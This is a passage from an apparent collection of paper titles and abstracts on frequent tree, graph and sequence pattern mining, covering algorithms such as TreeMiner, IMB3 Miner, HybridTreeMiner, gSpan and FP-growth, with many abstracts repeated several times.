mining, Web mining, etc. In general, most of the formally represented information in these domains is a tree structured form. In this paper we focus on mining frequent embedded subtrees from databases of rooted labeled ordered subtrees. We propose a novel and unique embedding list representation that is suitable for describing embedded subtrees. This representation is completely different from the string-like or conventional adjacency list representation previously utilized for trees. We present the mathematical model of a breadth-first-search Tree Model Guided (TMG) candidate generation approach previously introduced in [8]. The key characteristic of the TMG approach is that it enumerates fewer candidates by ensuring that only valid candidates that conform to the structural aspects of the data are generated as opposed to the join approach. Our experiments with both synthetic and real-life datasets provide comparisons against one of the state-of-the-art algorithms, TreeMiner [15], and they demonstrate the effectiveness and the efficiency of the technique. --- paper_title: IMB3 Miner: Mining Induced/Embedded Subtrees by Constraining the Level of Embedding paper_content: Tree mining has recently attracted a lot of interest in areas such as Bioinformatics, XML mining, Web mining, etc. We are mainly concerned with mining frequent induced and embedded subtrees. While more interesting patterns can be obtained when mining embedded subtrees, unfortunately mining such embedding relationships can be very costly. In this paper, we propose an efficient approach to tackle the complexity of mining embedded subtrees by utilizing a novel Embedding List representation, Tree Model Guided enumeration, and introducing the Level of Embedding constraint. Thus, when it is too costly to mine all frequent embedded subtrees, one can decrease the level of embedding constraint gradually up to 1, from which all the obtained frequent subtrees are induced subtrees. Our experiments with both synthetic and real datasets against two known algorithms for mining induced and embedded subtrees, FREQT and TreeMiner, demonstrate the effectiveness and the efficiency of the technique. --- paper_title: UNI3 - efficient algorithm for mining unordered induced subtrees using TMG candidate generation paper_content: Semi-structured data sources are increasingly in use today because of their capability of representing information through more complex structures where semantics and relationships of data objects are more easily expressed. Extraction of frequent sub-structures from such data has found important applications in areas such as Bioinformatics, XML mining, Web mining, scientific data management etc. This paper is concerned with the task of mining frequent unordered induced subtrees from a database of rooted ordered labeled subtrees. Our previous work in the area of frequent subtree mining is characterized by the efficient tree model guided (TMG) candidate enumeration, where candidate subtrees conform to the data's underlying tree structure. We apply the same approach to the unordered case, motivated by the fact that in many applications of frequent subtree mining the order among siblings is not considered important. The proposed UNI3 algorithm considers both transaction based and occurrence match support. Synthetic and real world data are used to evaluate the time performance of our approach in comparison to the well known algorithms developed for the same problem --- paper_title: Mining frequent patterns without candidate generation paper_content: Mining frequent patterns in transaction databases, time-series databases, and many other kinds of databases has been studied popularly in data mining research. Most of the previous studies adopt an Apriori-like candidate set generation-and-test approach. However, candidate set generation is still costly, especially when there exist prolific patterns and/or long patterns. In this study, we propose a novel frequent pattern tree (FP-tree) structure, which is an extended prefix-tree structure for storing compressed, crucial information about frequent patterns, and develop an efficient FP-tree-based mining method, FP-growth, for mining the complete set of frequent patterns by pattern fragment growth. Efficiency of mining is achieved with three techniques: (1) a large database is compressed into a highly condensed, much smaller data structure, which avoids costly, repeated database scans, (2) our FP-tree-based mining adopts a pattern fragment growth method to avoid the costly generation of a large number of candidate sets, and (3) a partitioning-based, divide-and-conquer method is used to decompose the mining task into a set of smaller tasks for mining confined patterns in conditional databases, which dramatically reduces the search space. Our performance study shows that the FP-growth method is efficient and scalable for mining both long and short frequent patterns, and is about an order of magnitude faster than the Apriori algorithm and also faster than some recently reported new frequent pattern mining methods. --- paper_title: Efficient data mining for maximal frequent subtrees paper_content: A new type of tree mining is defined, which uncovers maximal frequent induced subtrees from a database of unordered labeled trees. A novel algorithm, PathJoin, is proposed. The algorithm uses a compact data structure, FST-Forest, which compresses the trees and still keeps the original tree structure. PathJoin generates candidate subtrees by joining the frequent paths in FST-Forest. Such candidate subtree generation is localized and thus substantially reduces the number of candidate subtrees. Experiments with synthetic data sets show that the algorithm is effective and efficient. --- paper_title: Genome-scale disk-based suffix tree indexing paper_content: With the exponential growth of biological sequence databases, it has become critical to develop effective techniques for storing, querying, and analyzing these massive data. Suffix trees are widely used to solve many sequence-based problems, and they can be built in linear time and space, provided the resulting tree fits in main-memory. To index larger sequences, several external suffix tree algorithms have been proposed in recent years. However, they suffer from several problems such as susceptibility to data skew, non-scalability to genome-scale sequences, and non-existence of suffix links, which are crucial in various suffix tree based algorithms. In this paper, we target DNA sequences and propose a novel disk-based suffix tree algorithm called TRELLIS, which effectively scales up to genome-scale sequences. Specifically, it can index the entire human genome using 2GB of memory, in about 4 hours and can recover all its suffix links within 2 hours. TRELLIS was compared to various state-of-the-art persistent disk-based suffix tree construction algorithms, and was shown to outperform the best previous methods, both in terms of indexing time and querying time. --- paper_title: Practical methods for constructing suffix trees paper_content: Sequence datasets are ubiquitous in modern life-science applications, and querying sequences is a common and critical operation in many of these applications. The suffix tree is a versatile data structure that can be used to evaluate a wide variety of queries on sequence datasets, including evaluating exact and approximate string matches, and finding repeat patterns. However, methods for constructing suffix trees are often very time-consuming, especially for suffix trees that are large and do not fit in the available main memory. Even when the suffix tree fits in memory, it turns out that the processor cache behavior of theoretically optimal suffix tree construction methods is poor, resulting in poor performance. Currently, there are a large number of algorithms for constructing suffix trees, but the practical tradeoffs in using these algorithms for different scenarios are not well characterized.In this paper, we explore suffix tree construction algorithms over a wide spectrum of data sources and sizes. First, we show that on modern processors, a cache-efficient algorithm with O(n2) worst-case complexity outperforms popular linear time algorithms like Ukkonen and McCreight, even for in-memory construction. For larger datasets, the disk I/O requirement quickly becomes the bottleneck in each algorithm's performance. To address this problem, we describe two approaches. First, we present a buffer management strategy for the O(n2) algorithm. The resulting new algorithm, which we call “Top Down Disk-based” (TDD), scales to sizes much larger than have been previously described in literature. This approach far outperforms the best known disk-based construction methods. Second, we present a new disk-based suffix tree construction algorithm that is based on a sort-merge paradigm, and show that for constructing very large suffix trees with very little resources, this algorithm is more efficient than TDD. --- paper_title: AMIOT: induced ordered tree mining in tree-structured databases paper_content: Frequent subtree mining has become increasingly important in recent years. In this paper, we present AMIOT algorithm to discover all frequent ordered subtrees in a tree-structured database. In order to avoid the generation of infrequent candidate trees, we propose the techniques such as right-and-left tree join and serial tree extension. Proposed methods enumerate only the candidate trees with high probability of being frequent without any duplication. The experiments on synthetic dataset and XML database show that AMIOT reduces redundant candidate trees and outperforms FREQT algorithm by up to five times in execution time. --- paper_title: HybridTreeMiner: an efficient algorithm for mining frequent rooted trees and free trees using canonical forms paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, XML databases, computer networks, and so on. In this paper, we present HybridTreeMiner, a computationally efficient algorithm that discovers all frequently occurring subtrees in a database of rooted unordered trees. The algorithm mines frequent subtrees by traversing an enumeration tree that systematically enumerates all subtrees. The enumeration tree is defined based on a novel canonical form for rooted unordered trees - the breadth-first canonical form (BFCF). By extending the definitions of our canonical form and enumeration tree to free trees, our algorithm can efficiently handle databases of free trees as well. We study the performance of our algorithms through extensive experiments based on both synthetic data and datasets from real applications. The experiments show that our algorithm is competitive in comparison to known rooted tree mining algorithms and is faster by one to two orders of magnitudes compared to a known algorithm for mining frequent free trees. --- paper_title: Discovering Frequent Substructures in Large Unordered Trees paper_content: In this paper, we study a frequent substructure discovery problem in semi-structured data. We present an efficient algorithm Unotthat computes all frequent labeled unordered trees appearing in a large collection of data trees with frequency above a user-specified threshold. The keys of the algorithm are efficient enumeration of all unordered trees in canonical form and incremental computation of their occurrences. We then show that Unotdiscovers each frequent pattern T in O(kb 2 m) per pattern, where k is the size of T, b is the branching factor of the data trees, and m is the total number of occurrences of T in the data trees. --- paper_title: HybridTreeMiner: an efficient algorithm for mining frequent rooted trees and free trees using canonical forms paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, XML databases, computer networks, and so on. In this paper, we present HybridTreeMiner, a computationally efficient algorithm that discovers all frequently occurring subtrees in a database of rooted unordered trees. The algorithm mines frequent subtrees by traversing an enumeration tree that systematically enumerates all subtrees. The enumeration tree is defined based on a novel canonical form for rooted unordered trees - the breadth-first canonical form (BFCF). By extending the definitions of our canonical form and enumeration tree to free trees, our algorithm can efficiently handle databases of free trees as well. We study the performance of our algorithms through extensive experiments based on both synthetic data and datasets from real applications. The experiments show that our algorithm is competitive in comparison to known rooted tree mining algorithms and is faster by one to two orders of magnitudes compared to a known algorithm for mining frequent free trees. --- paper_title: gSpan: graph-based substructure pattern mining paper_content: We investigate new approaches for frequent graph-based pattern mining in graph datasets and propose a novel algorithm called gSpan (graph-based substructure pattern mining), which discovers frequent substructures without candidate generation. gSpan builds a new lexicographic order among graphs, and maps each graph to a unique minimum DFS code as its canonical label. Based on this lexicographic order gSpan adopts the depth-first search strategy to mine frequent connected subgraphs efficiently. Our performance study shows that gSpan substantially outperforms previous algorithms, sometimes by an order of magnitude. --- paper_title: Indexing and mining free trees paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, computer networks, and so on. We present an indexing technique for free trees and apply this indexing technique to the problem of mining frequent subtrees. We first define a novel representation, the canonical form, for rooted trees and extend the definition to free trees. We also introduce another concept, the canonical string, as a simpler representation for free trees in their canonical forms. We then apply our tree indexing technique to the frequent subtree mining problem and present FreeTreeMiner, a computationally efficient algorithm that discovers all frequently occurring subtrees in a database of free trees. We study the performance and the scalability of our algorithms through extensive experiments based on both synthetic data and datasets from two real applications: a dataset of chemical compounds and a dataset of Internet multicast trees. --- paper_title: A quickstart in frequent structure mining can make a difference paper_content: Given a database, structure mining algorithms search for substructures that satisfy constraints such as minimum frequency, minimum confidence, minimum interest and maximum frequency. Examples of substructures include graphs, trees and paths. For these substructures many mining algorithms have been proposed. In order to make graph mining more efficient, we investigate the use of the "quickstart principle", which is based on the fact that these classes of structures are contained in each other, thus allowing for the development of structure mining algorithms that split the search into steps of increasing complexity. We introduce the GrAph/Sequence/Tree extractiON ( Gaston ) algorithm that implements this idea by searching first for frequent paths, then frequent free trees and finally cyclic graphs. We investigate two alternatives for computing the frequency of structures and present experimental results to relate these alternatives. --- paper_title: Frequent free tree discovery in graph data paper_content: In recent years, researchers in graph mining have been exploring linear paths as well as subgraphs as pattern languages. In this paper, we are investigating the middle ground between these two extremes: mining free (that is, unrooted) trees in graph data. The motivation for this is the need to upgrade linear path patterns, while avoiding complexity issues with subgraph patterns. Starting from such complexity considerations, we are defining free trees and their canonical form, before we present FreeTreeMiner, an algorithm making efficient use of this canonical form during search. Experiments with two datasets from the National Cancer Institute's Developmental Therapeutics Program (DTP), anti-HIV and anti-cancer screening data, are reported. --- paper_title: Efficiently mining frequent trees in a forest: algorithms and applications paper_content: Mining frequent trees is very useful in domains like bioinformatics, Web mining, mining semistructured data, etc. We formulate the problem of mining (embedded) subtrees in a forest of rooted, labeled, and ordered trees. We present TREEMINER, a novel algorithm to discover all frequent subtrees in a forest, using a new data structure called scope-list. We contrast TREEMINER with a pattern matching tree mining algorithm (PATTERNMATCHER), and we also compare it with TREEMINERD, which counts only distinct occurrences of a pattern. We conduct detailed experiments to test the performance and scalability of these methods. We also use tree mining to analyze RNA structure and phylogenetics data sets from bioinformatics domain. --- paper_title: MB3 Miner: mining eMBedded sub-TREEs using Tree Model Guided candidate generation paper_content: Tree mining has many useful applications in areas such as Bioinformatics, XML mining, Web mining, etc. In general, most of the formally represented information in these domains is a tree structured form. In this paper we focus on mining frequent embedded subtrees from databases of rooted labeled ordered subtrees. We propose a novel and unique embedding list representation that is suitable for describing embedded subtrees. This representation is completely different from the string-like or conventional adjacency list representation previously utilized for trees. We present the mathematical model of a breadth-first-search Tree Model Guided (TMG) candidate generation approach previously introduced in [8]. The key characteristic of the TMG approach is that it enumerates fewer candidates by ensuring that only valid candidates that conform to the structural aspects of the data are generated as opposed to the join approach. Our experiments with both synthetic and real-life datasets provide comparisons against one of the state-of-the-art algorithms, TreeMiner [15], and they demonstrate the effectiveness and the efficiency of the technique. --- paper_title: IMB3 Miner: Mining Induced/Embedded Subtrees by Constraining the Level of Embedding paper_content: Tree mining has recently attracted a lot of interest in areas such as Bioinformatics, XML mining, Web mining, etc. We are mainly concerned with mining frequent induced and embedded subtrees. While more interesting patterns can be obtained when mining embedded subtrees, unfortunately mining such embedding relationships can be very costly. In this paper, we propose an efficient approach to tackle the complexity of mining embedded subtrees by utilizing a novel Embedding List representation, Tree Model Guided enumeration, and introducing the Level of Embedding constraint. Thus, when it is too costly to mine all frequent embedded subtrees, one can decrease the level of embedding constraint gradually up to 1, from which all the obtained frequent subtrees are induced subtrees. Our experiments with both synthetic and real datasets against two known algorithms for mining induced and embedded subtrees, FREQT and TreeMiner, demonstrate the effectiveness and the efficiency of the technique. --- paper_title: IMB3 Miner: Mining Induced/Embedded Subtrees by Constraining the Level of Embedding paper_content: Tree mining has recently attracted a lot of interest in areas such as Bioinformatics, XML mining, Web mining, etc. We are mainly concerned with mining frequent induced and embedded subtrees. While more interesting patterns can be obtained when mining embedded subtrees, unfortunately mining such embedding relationships can be very costly. In this paper, we propose an efficient approach to tackle the complexity of mining embedded subtrees by utilizing a novel Embedding List representation, Tree Model Guided enumeration, and introducing the Level of Embedding constraint. Thus, when it is too costly to mine all frequent embedded subtrees, one can decrease the level of embedding constraint gradually up to 1, from which all the obtained frequent subtrees are induced subtrees. Our experiments with both synthetic and real datasets against two known algorithms for mining induced and embedded subtrees, FREQT and TreeMiner, demonstrate the effectiveness and the efficiency of the technique. --- paper_title: Efficiently Mining Frequent Embedded Unordered Trees paper_content: Mining frequent trees is very useful in domains like bioinformatics, web mining, mining semi-structured data, and so on. In this paper we introduce SLEUTH, an efficient algorithm for mining frequent, unordered, embedded subtrees in a database of labeled trees. The key contributions of our work are as follows: We give the first algorithm that enumerates all embedded, unordered trees. We propose a new equivalence class extension scheme to generate all candidate trees. We extend the notion of scope-list joins to compute frequency of unordered trees. We conduct performance evaluation on several synthetic and real datasets to show that SLEUTH is an efficient algorithm, which has performance comparable to TreeMiner, that mines only ordered trees. --- paper_title: UNI3 - efficient algorithm for mining unordered induced subtrees using TMG candidate generation paper_content: Semi-structured data sources are increasingly in use today because of their capability of representing information through more complex structures where semantics and relationships of data objects are more easily expressed. Extraction of frequent sub-structures from such data has found important applications in areas such as Bioinformatics, XML mining, Web mining, scientific data management etc. This paper is concerned with the task of mining frequent unordered induced subtrees from a database of rooted ordered labeled subtrees. Our previous work in the area of frequent subtree mining is characterized by the efficient tree model guided (TMG) candidate enumeration, where candidate subtrees conform to the data's underlying tree structure. We apply the same approach to the unordered case, motivated by the fact that in many applications of frequent subtree mining the order among siblings is not considered important. The proposed UNI3 algorithm considers both transaction based and occurrence match support. Synthetic and real world data are used to evaluate the time performance of our approach in comparison to the well known algorithms developed for the same problem --- paper_title: Discovering Frequent Agreement Subtrees from Phylogenetic Data paper_content: We study a new data mining problem concerning the discovery of frequent agreement subtrees (FASTs) from a set of phylogenetic trees. A phylogenetic tree, or phylogeny, is an unordered tree in which the order among siblings is unimportant. Furthermore, each leaf in the tree has a label representing a taxon (species or organism) name, whereas internal nodes are unlabeled. The tree may have a root, representing the common ancestor of all species in the tree, or may be unrooted. An unrooted phylogeny arises due to the lack of sufficient evidence to infer a common ancestor of the taxa in the tree. The FAST problem addressed here is a natural extension of the maximum agreement subtree (MAST) problem widely studied in the computational phylogenetics community. The paper establishes a framework for tackling the FAST problem for both rooted and unrooted phylogenetic trees using data mining techniques. We first develop a novel canonical form for rooted trees together with a phylogeny-aware tree expansion scheme for generating candidate subtrees level by level. Then, we present an efficient algorithm to find all FASTs in a given set of rooted trees, through an Apriori-like approach. We show the correctness and completeness of the proposed method. Finally, we discuss the extensions of the techniques to unrooted trees. Experimental results demonstrate that the proposed methods work well, and are capable of finding interesting patterns in both synthetic data and real phylogenetic trees. --- paper_title: Mining Induced and Embedded Subtrees in Ordered, Unordered, and Partially-Ordered Trees paper_content: Many data mining problems can be represented with non-linear data structures like trees. In this paper, we introduce a scalable algorithm to mine partially-ordered trees. Our algorithm, POTMiner, is able to identify both induced and embedded subtrees and, as special cases, it can handle both completely ordered and completely unordered trees (i.e. the particular situations existing algorithms address). --- paper_title: TRIPS and TIDES: new algorithms for tree mining paper_content: Recent research in data mining has progressed from mining frequent itemsets to more general and structured patterns like trees and graphs. In this paper, we address the problem of frequent subtree mining that has proven to be viable in a wide range of applications such as bioinformatics, XML processing, computational linguistics, and web usage mining. We propose novel algorithms to mine frequent subtrees from a database of rooted trees. We evaluate the use of two popular sequential encodings of trees to systematically generate and evaluate the candidate patterns. The proposed approach is very generic and can be used to mine embedded or induced subtrees that can be labeled, unlabeled, ordered, unordered, or edge-labeled. Our algorithms are highly cache-conscious in nature because of the compact and simple array-based data structures we use. Typically, L1 and L2 hit rates above 99% are observed. Experimental evaluation showed that our algorithms can achieve up to several orders of magnitude speedup on real datasets when compared to state-of-the-art tree mining algorithms. --- paper_title: To see the wood for the trees: mining frequent tree patterns paper_content: Various definitions and frameworks for discovering frequent trees in forests have been developed recently. At the heart of these frameworks lies the notion of matching, which determines if a pattern tree matches a tree in a data set. We compare four notions of tree matching for use in frequent tree mining and show how they are related to each other. Furthermore, we show how Zaki's TreeMinerV algorithm can be adapted to employ three of the four notions of tree matching. Experiments on synthetic and real world data highlight the differences between the matchings. --- paper_title: TreeFinder: a first step towards XML data mining paper_content: In this paper we consider the problem of searching frequent trees from a collection of tree-structured data modeling XML data. The TreeFinder algorithm aims at finding trees, such that their exact or perturbed copies are frequent in a collection of labelled trees. To cope with complexity issues, TreeFinder is correct but not complete: it finds a subset of actually frequent trees. The default of completeness is experimentally investigated on artificial medium size datasets; it is shown that TreeFinder reaches completeness or falls short for a range of experimental settings. --- paper_title: Mining Closed and Maximal Frequent Subtrees from Databases of Labeled Rooted Trees paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, XML databases, computer networks, and so on. One important problem in mining databases of trees is to find frequently occurring subtrees. Because of the combinatorial explosion, the number of frequent subtrees usually grows exponentially with the size of frequent subtrees and, therefore, mining all frequent subtrees becomes infeasible for large tree sizes. We present CMTreeMiner, a computationally efficient algorithm that discovers only closed and maximal frequent subtrees in a database of labeled rooted trees, where the rooted trees can be either ordered or unordered. The algorithm mines both closed and maximal frequent subtrees by traversing an enumeration tree that systematically enumerates all frequent subtrees. Several techniques are proposed to prune the branches of the enumeration tree that do not correspond to closed or maximal frequent subtrees. Heuristic techniques are used to arrange the order of computation so that relatively expensive computation is avoided as much as possible. We study the performance of our algorithm through extensive experiments, using both synthetic data and data sets from real applications. The experimental results show that our algorithm is very efficient in reducing the search space and quickly discovers all closed and maximal frequent subtrees. --- paper_title: Efficient data mining for maximal frequent subtrees paper_content: A new type of tree mining is defined, which uncovers maximal frequent induced subtrees from a database of unordered labeled trees. A novel algorithm, PathJoin, is proposed. The algorithm uses a compact data structure, FST-Forest, which compresses the trees and still keeps the original tree structure. PathJoin generates candidate subtrees by joining the frequent paths in FST-Forest. Such candidate subtree generation is localized and thus substantially reduces the number of candidate subtrees. Experiments with synthetic data sets show that the algorithm is effective and efficient. --- paper_title: HybridTreeMiner: an efficient algorithm for mining frequent rooted trees and free trees using canonical forms paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, XML databases, computer networks, and so on. In this paper, we present HybridTreeMiner, a computationally efficient algorithm that discovers all frequently occurring subtrees in a database of rooted unordered trees. The algorithm mines frequent subtrees by traversing an enumeration tree that systematically enumerates all subtrees. The enumeration tree is defined based on a novel canonical form for rooted unordered trees - the breadth-first canonical form (BFCF). By extending the definitions of our canonical form and enumeration tree to free trees, our algorithm can efficiently handle databases of free trees as well. We study the performance of our algorithms through extensive experiments based on both synthetic data and datasets from real applications. The experiments show that our algorithm is competitive in comparison to known rooted tree mining algorithms and is faster by one to two orders of magnitudes compared to a known algorithm for mining frequent free trees. --- paper_title: Efficiently mining frequent trees in a forest: algorithms and applications paper_content: Mining frequent trees is very useful in domains like bioinformatics, Web mining, mining semistructured data, etc. We formulate the problem of mining (embedded) subtrees in a forest of rooted, labeled, and ordered trees. We present TREEMINER, a novel algorithm to discover all frequent subtrees in a forest, using a new data structure called scope-list. We contrast TREEMINER with a pattern matching tree mining algorithm (PATTERNMATCHER), and we also compare it with TREEMINERD, which counts only distinct occurrences of a pattern. We conduct detailed experiments to test the performance and scalability of these methods. We also use tree mining to analyze RNA structure and phylogenetics data sets from bioinformatics domain. --- paper_title: Discovering Frequent Substructures in Large Unordered Trees paper_content: In this paper, we study a frequent substructure discovery problem in semi-structured data. We present an efficient algorithm Unotthat computes all frequent labeled unordered trees appearing in a large collection of data trees with frequency above a user-specified threshold. The keys of the algorithm are efficient enumeration of all unordered trees in canonical form and incremental computation of their occurrences. We then show that Unotdiscovers each frequent pattern T in O(kb 2 m) per pattern, where k is the size of T, b is the branching factor of the data trees, and m is the total number of occurrences of T in the data trees. --- paper_title: Efficiently Mining Frequent Embedded Unordered Trees paper_content: Mining frequent trees is very useful in domains like bioinformatics, web mining, mining semi-structured data, and so on. In this paper we introduce SLEUTH, an efficient algorithm for mining frequent, unordered, embedded subtrees in a database of labeled trees. The key contributions of our work are as follows: We give the first algorithm that enumerates all embedded, unordered trees. We propose a new equivalence class extension scheme to generate all candidate trees. We extend the notion of scope-list joins to compute frequency of unordered trees. We conduct performance evaluation on several synthetic and real datasets to show that SLEUTH is an efficient algorithm, which has performance comparable to TreeMiner, that mines only ordered trees. --- paper_title: Dryade: a new approach for discovering closed frequent trees in heterogeneous tree databases paper_content: In this paper we present a novel algorithm for discovering tree patterns in a tree database. This algorithm uses a relaxed tree inclusion definition, making the problem more complex (checking tree inclusion is NP-complete), but allowing to mine highly heterogeneous databases. To obtain good performances, our DRYADE algorithm, discovers only closed frequent tree patterns. --- paper_title: AMIOT: induced ordered tree mining in tree-structured databases paper_content: Frequent subtree mining has become increasingly important in recent years. In this paper, we present AMIOT algorithm to discover all frequent ordered subtrees in a tree-structured database. In order to avoid the generation of infrequent candidate trees, we propose the techniques such as right-and-left tree join and serial tree extension. Proposed methods enumerate only the candidate trees with high probability of being frequent without any duplication. The experiments on synthetic dataset and XML database show that AMIOT reduces redundant candidate trees and outperforms FREQT algorithm by up to five times in execution time. --- paper_title: Indexing and mining free trees paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, computer networks, and so on. We present an indexing technique for free trees and apply this indexing technique to the problem of mining frequent subtrees. We first define a novel representation, the canonical form, for rooted trees and extend the definition to free trees. We also introduce another concept, the canonical string, as a simpler representation for free trees in their canonical forms. We then apply our tree indexing technique to the frequent subtree mining problem and present FreeTreeMiner, a computationally efficient algorithm that discovers all frequently occurring subtrees in a database of free trees. We study the performance and the scalability of our algorithms through extensive experiments based on both synthetic data and datasets from two real applications: a dataset of chemical compounds and a dataset of Internet multicast trees. --- paper_title: TreeFinder: a first step towards XML data mining paper_content: In this paper we consider the problem of searching frequent trees from a collection of tree-structured data modeling XML data. The TreeFinder algorithm aims at finding trees, such that their exact or perturbed copies are frequent in a collection of labelled trees. To cope with complexity issues, TreeFinder is correct but not complete: it finds a subset of actually frequent trees. The default of completeness is experimentally investigated on artificial medium size datasets; it is shown that TreeFinder reaches completeness or falls short for a range of experimental settings. --- paper_title: A quickstart in frequent structure mining can make a difference paper_content: Given a database, structure mining algorithms search for substructures that satisfy constraints such as minimum frequency, minimum confidence, minimum interest and maximum frequency. Examples of substructures include graphs, trees and paths. For these substructures many mining algorithms have been proposed. In order to make graph mining more efficient, we investigate the use of the "quickstart principle", which is based on the fact that these classes of structures are contained in each other, thus allowing for the development of structure mining algorithms that split the search into steps of increasing complexity. We introduce the GrAph/Sequence/Tree extractiON ( Gaston ) algorithm that implements this idea by searching first for frequent paths, then frequent free trees and finally cyclic graphs. We investigate two alternatives for computing the frequency of structures and present experimental results to relate these alternatives. --- paper_title: Efficient mining of high branching factor attribute trees paper_content: In this paper, we present a new tree mining algorithm, DryadeParent, based on the hooking principle first introduced in Dryade (Termier et al, 2004). In the experiments, we demonstrate that the branching factor and depth of the frequent patterns to find are key factor of complexity for tree mining algorithms. We show that DryadeParent outperforms the current fastest algorithm, CMTreeMiner, by orders of magnitude on datasets where the frequent patterns have a high branching factor. --- paper_title: Frequent free tree discovery in graph data paper_content: In recent years, researchers in graph mining have been exploring linear paths as well as subgraphs as pattern languages. In this paper, we are investigating the middle ground between these two extremes: mining free (that is, unrooted) trees in graph data. The motivation for this is the need to upgrade linear path patterns, while avoiding complexity issues with subgraph patterns. Starting from such complexity considerations, we are defining free trees and their canonical form, before we present FreeTreeMiner, an algorithm making efficient use of this canonical form during search. Experiments with two datasets from the National Cancer Institute's Developmental Therapeutics Program (DTP), anti-HIV and anti-cancer screening data, are reported. --- paper_title: HybridTreeMiner: an efficient algorithm for mining frequent rooted trees and free trees using canonical forms paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, XML databases, computer networks, and so on. In this paper, we present HybridTreeMiner, a computationally efficient algorithm that discovers all frequently occurring subtrees in a database of rooted unordered trees. The algorithm mines frequent subtrees by traversing an enumeration tree that systematically enumerates all subtrees. The enumeration tree is defined based on a novel canonical form for rooted unordered trees - the breadth-first canonical form (BFCF). By extending the definitions of our canonical form and enumeration tree to free trees, our algorithm can efficiently handle databases of free trees as well. We study the performance of our algorithms through extensive experiments based on both synthetic data and datasets from real applications. The experiments show that our algorithm is competitive in comparison to known rooted tree mining algorithms and is faster by one to two orders of magnitudes compared to a known algorithm for mining frequent free trees. --- paper_title: Efficiently mining frequent trees in a forest: algorithms and applications paper_content: Mining frequent trees is very useful in domains like bioinformatics, Web mining, mining semistructured data, etc. We formulate the problem of mining (embedded) subtrees in a forest of rooted, labeled, and ordered trees. We present TREEMINER, a novel algorithm to discover all frequent subtrees in a forest, using a new data structure called scope-list. We contrast TREEMINER with a pattern matching tree mining algorithm (PATTERNMATCHER), and we also compare it with TREEMINERD, which counts only distinct occurrences of a pattern. We conduct detailed experiments to test the performance and scalability of these methods. We also use tree mining to analyze RNA structure and phylogenetics data sets from bioinformatics domain. --- paper_title: To see the wood for the trees: mining frequent tree patterns paper_content: Various definitions and frameworks for discovering frequent trees in forests have been developed recently. At the heart of these frameworks lies the notion of matching, which determines if a pattern tree matches a tree in a data set. We compare four notions of tree matching for use in frequent tree mining and show how they are related to each other. Furthermore, we show how Zaki's TreeMinerV algorithm can be adapted to employ three of the four notions of tree matching. Experiments on synthetic and real world data highlight the differences between the matchings. --- paper_title: PrefixSpan,: mining sequential patterns efficiently by prefix-projected pattern growth paper_content: Sequential pattern mining is an important data mining problem with broad applications. It is challenging since one may need to examine a combinatorially explosive number of possible subsequence patterns. Most of the previously developed sequential pattern mining methods follow the methodology of A priori which may substantially reduce the number of combinations to be examined. Howeve6 Apriori still encounters problems when a sequence database is large andor when sequential patterns to be mined are numerous ano we propose a novel sequential pattern mining method, called Prefixspan (i.e., Prefix-projected - Ettern_ mining), which explores prejxprojection in sequential pattern mining. Prefixspan mines the complete set of patterns but greatly reduces the efforts of candidate subsequence generation. Moreover; prefi-projection substantially reduces the size of projected databases and leads to efJicient processing. Our performance study shows that Prefixspan outperforms both the Apriori-based GSP algorithm and another recently proposed method; Frees pan, in mining large sequence data bases. --- paper_title: AMIOT: induced ordered tree mining in tree-structured databases paper_content: Frequent subtree mining has become increasingly important in recent years. In this paper, we present AMIOT algorithm to discover all frequent ordered subtrees in a tree-structured database. In order to avoid the generation of infrequent candidate trees, we propose the techniques such as right-and-left tree join and serial tree extension. Proposed methods enumerate only the candidate trees with high probability of being frequent without any duplication. The experiments on synthetic dataset and XML database show that AMIOT reduces redundant candidate trees and outperforms FREQT algorithm by up to five times in execution time. --- paper_title: Indexing and mining free trees paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, computer networks, and so on. We present an indexing technique for free trees and apply this indexing technique to the problem of mining frequent subtrees. We first define a novel representation, the canonical form, for rooted trees and extend the definition to free trees. We also introduce another concept, the canonical string, as a simpler representation for free trees in their canonical forms. We then apply our tree indexing technique to the frequent subtree mining problem and present FreeTreeMiner, a computationally efficient algorithm that discovers all frequently occurring subtrees in a database of free trees. We study the performance and the scalability of our algorithms through extensive experiments based on both synthetic data and datasets from two real applications: a dataset of chemical compounds and a dataset of Internet multicast trees. --- paper_title: Frequent free tree discovery in graph data paper_content: In recent years, researchers in graph mining have been exploring linear paths as well as subgraphs as pattern languages. In this paper, we are investigating the middle ground between these two extremes: mining free (that is, unrooted) trees in graph data. The motivation for this is the need to upgrade linear path patterns, while avoiding complexity issues with subgraph patterns. Starting from such complexity considerations, we are defining free trees and their canonical form, before we present FreeTreeMiner, an algorithm making efficient use of this canonical form during search. Experiments with two datasets from the National Cancer Institute's Developmental Therapeutics Program (DTP), anti-HIV and anti-cancer screening data, are reported. --- paper_title: Discovering Frequent Substructures in Large Unordered Trees paper_content: In this paper, we study a frequent substructure discovery problem in semi-structured data. We present an efficient algorithm Unotthat computes all frequent labeled unordered trees appearing in a large collection of data trees with frequency above a user-specified threshold. The keys of the algorithm are efficient enumeration of all unordered trees in canonical form and incremental computation of their occurrences. We then show that Unotdiscovers each frequent pattern T in O(kb 2 m) per pattern, where k is the size of T, b is the branching factor of the data trees, and m is the total number of occurrences of T in the data trees. --- paper_title: MB3 Miner: mining eMBedded sub-TREEs using Tree Model Guided candidate generation paper_content: Tree mining has many useful applications in areas such as Bioinformatics, XML mining, Web mining, etc. In general, most of the formally represented information in these domains is a tree structured form. In this paper we focus on mining frequent embedded subtrees from databases of rooted labeled ordered subtrees. We propose a novel and unique embedding list representation that is suitable for describing embedded subtrees. This representation is completely different from the string-like or conventional adjacency list representation previously utilized for trees. We present the mathematical model of a breadth-first-search Tree Model Guided (TMG) candidate generation approach previously introduced in [8]. The key characteristic of the TMG approach is that it enumerates fewer candidates by ensuring that only valid candidates that conform to the structural aspects of the data are generated as opposed to the join approach. Our experiments with both synthetic and real-life datasets provide comparisons against one of the state-of-the-art algorithms, TreeMiner [15], and they demonstrate the effectiveness and the efficiency of the technique. --- paper_title: IMB3 Miner: Mining Induced/Embedded Subtrees by Constraining the Level of Embedding paper_content: Tree mining has recently attracted a lot of interest in areas such as Bioinformatics, XML mining, Web mining, etc. We are mainly concerned with mining frequent induced and embedded 